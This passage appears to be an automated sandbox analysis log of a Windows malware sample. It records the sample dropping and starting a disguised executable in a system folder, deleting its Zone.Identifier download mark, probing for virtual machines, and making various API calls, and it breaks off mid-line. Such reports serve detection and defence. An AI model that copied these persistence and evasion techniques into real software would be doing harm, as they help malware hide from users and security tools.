                Source: C:\Windows\System32\svchost.exe | File created: C:\Users\user\AppData\Local\Comms\UnistoreDB\tmp.edb
                Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4660:120:WilError_01
                Source: 23cf697d5faf11a3ffdd271e1d301173.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe | File read: C:\Users\desktop.ini
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
                Source: unknown | Process created: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe 'C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe'
                Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s NgcSvc
                Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s NgcCtnrSvc
                Source: unknown | Process created: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe C:\Windows\SysWOW64\cleanmgr\dot3hc.exe
                Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
                Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                Source: unknown | Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknown | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe | Process created: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe C:\Windows\SysWOW64\cleanmgr\dot3hc.exe
                Source: C:\Windows\System32\svchost.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe | Code function: 0_2_00402770 LoadLibraryA,LoadLibraryA,GetProcAddress,EncryptFileA,GetModuleHandleA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,LoadLibraryA,GetProcAddress,GetCurrentProcess,VirtualAllocExNuma,DialogBoxParamA,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe | Code function: 0_2_00406030 push eax; ret
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe | Code function: 0_2_00408963 push ecx; ret
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe | Code function: 0_2_0040AB90 push eax; ret
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe | Code function: 0_2_02635E70 push ecx; mov dword ptr [esp], 00008D73h
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe | Code function: 0_2_02635E40 push ecx; mov dword ptr [esp], 0000AEA2h
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe | Code function: 0_2_02635EA0 push ecx; mov dword ptr [esp], 00007473h
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe | Code function: 0_2_02635F70 push ecx; mov dword ptr [esp], 000084ADh
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe | Code function: 0_2_02635F20 push ecx; mov dword ptr [esp], 0000E2ADh
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe | Code function: 0_2_02635FB0 push ecx; mov dword ptr [esp], 0000460Eh
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe | Code function: 0_2_02635D70 push ecx; mov dword ptr [esp], 00008067h
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe | Code function: 0_2_02635D30 push ecx; mov dword ptr [esp], 00002C7Ch
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe | Code function: 0_2_02635D00 push ecx; mov dword ptr [esp], 000021B4h
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe | Code function: 0_2_02635DE0 push ecx; mov dword ptr [esp], 000025AAh
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe | Code function: 0_2_02635DA0 push ecx; mov dword ptr [esp], 000036B8h
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe | Code function: 0_2_02127A0E push ecx; mov dword ptr [esp], 00008D73h
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe | Code function: 0_2_02127A3E push ecx; mov dword ptr [esp], 00007473h
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe | Code function: 0_2_02127ABE push ecx; mov dword ptr [esp], 0000E2ADh
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe | Code function: 0_2_02127B0E push ecx; mov dword ptr [esp], 000084ADh
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe | Code function: 0_2_02127B4E push ecx; mov dword ptr [esp], 0000460Eh
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe | Code function: 0_2_0212789E push ecx; mov dword ptr [esp], 000021B4h
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe | Code function: 0_2_021278CE push ecx; mov dword ptr [esp], 00002C7Ch
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe | Code function: 0_2_0212790E push ecx; mov dword ptr [esp], 00008067h
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe | Code function: 0_2_0212793E push ecx; mov dword ptr [esp], 000036B8h
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe | Code function: 0_2_0212797E push ecx; mov dword ptr [esp], 000025AAh
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe | Code function: 0_2_021279DE push ecx; mov dword ptr [esp], 0000AEA2h
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe | Code function: 3_2_00406030 push eax; ret
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe | Code function: 3_2_00408963 push ecx; ret
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe | Code function: 3_2_0040AB90 push eax; ret
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe | Code function: 3_2_02175E40 push ecx; mov dword ptr [esp], 0000AEA2h

                Persistence and Installation Behavior:

                Drops executables to the windows directory (C:\Windows) and starts them
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe | Executable created and started: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe | PE file moved: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe

                Hooking and other Techniques for Hiding and Protection:

                barindex
                Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeFile opened: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe:Zone.Identifier read attributes | delete
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeFile opened: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe:Zone.Identifier read attributes | delete
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: QueryServiceConfig2W,CloseServiceHandle,ChangeServiceConfig2W,EnumServicesStatusExW,GetTickCount,OpenServiceW,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,RtlFreeHeap,
                Source: C:\Windows\System32\svchost.exe TID: 6408Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeFile Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02633A10 _snwprintf,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindClose,FindClose,
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeCode function: 3_2_02173A10 _snwprintf,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindClose,FindClose,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_0040D8AC VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect,
                Source: svchost.exe, 00000005.00000002.236394856.000001FFC9140000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.292065099.0000028E9FF40000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.486558632.0000022005F40000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.308764171.0000029699140000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                Source: svchost.exe, 00000007.00000002.488474706.0000027E35662000.00000004.00000001.sdmpBinary or memory string: @Hyper-V RAW
                Source: svchost.exe, 00000006.00000002.481994541.000001F95C402000.00000004.00000001.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                Source: dot3hc.exe, 00000003.00000002.484904618.00000000022D4000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.488445142.0000027E35655000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                Source: svchost.exe, 00000005.00000002.236394856.000001FFC9140000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.292065099.0000028E9FF40000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.486558632.0000022005F40000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.308764171.0000029699140000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                Source: svchost.exe, 00000005.00000002.236394856.000001FFC9140000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.292065099.0000028E9FF40000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.486558632.0000022005F40000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.308764171.0000029699140000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                Source: svchost.exe, 00000007.00000002.483403302.0000027E2FE29000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW]f5~
                Source: svchost.exe, 00000006.00000002.482120336.000001F95C429000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.482526087.0000022005268000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.482223226.000002088D829000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: svchost.exe, 00000005.00000002.236394856.000001FFC9140000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.292065099.0000028E9FF40000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.486558632.0000022005F40000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.308764171.0000029699140000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_00402770 LoadLibraryA,LoadLibraryA,GetProcAddress,EncryptFileA,GetModuleHandleA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,LoadLibraryA,GetProcAddress,GetCurrentProcess,VirtualAllocExNuma,DialogBoxParamA,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02634E10 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02633F70 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02125B0E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02120456 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_0212095E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_021269AE mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_025E1030 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeCode function: 3_2_02174E10 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeCode function: 3_2_02173F70 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeCode function: 3_2_020E1030 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_00409FBA SetUnhandledExceptionFilter,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_00409FCE SetUnhandledExceptionFilter,
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeCode function: 3_2_00409FBA SetUnhandledExceptionFilter,
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeCode function: 3_2_00409FCE SetUnhandledExceptionFilter,
                Source: dot3hc.exe, 00000003.00000002.483551801.0000000000CD0000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.484518801.00000212DA190000.00000002.00000001.sdmpBinary or memory string: Program Manager
                Source: dot3hc.exe, 00000003.00000002.483551801.0000000000CD0000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.484518801.00000212DA190000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                Source: dot3hc.exe, 00000003.00000002.483551801.0000000000CD0000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.484518801.00000212DA190000.00000002.00000001.sdmpBinary or memory string: Progman
                Source: dot3hc.exe, 00000003.00000002.483551801.0000000000CD0000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.484518801.00000212DA190000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: GetLocaleInfoA,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: GetLocaleInfoA,MultiByteToWideChar,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: _strlen,_strlen,EnumSystemLocalesA,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: _strlen,EnumSystemLocalesA,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: _strlen,EnumSystemLocalesA,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: GetLocaleInfoW,WideCharToMultiByte,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: GetLocaleInfoA,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: GetLocaleInfoA,IsValidCodePage,IsValidLocale,
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeCode function: GetLocaleInfoA,
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar,
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeCode function: GetLocaleInfoA,MultiByteToWideChar,
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA,
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeCode function: _strlen,_strlen,EnumSystemLocalesA,
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeCode function: _strlen,EnumSystemLocalesA,
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeCode function: _strlen,EnumSystemLocalesA,
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeCode function: GetLocaleInfoW,WideCharToMultiByte,
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeCode function: GetLocaleInfoA,
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeCode function: GetLocaleInfoA,IsValidCodePage,IsValidLocale,
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jcp VolumeInformation
                Source: C:\Windows\System32\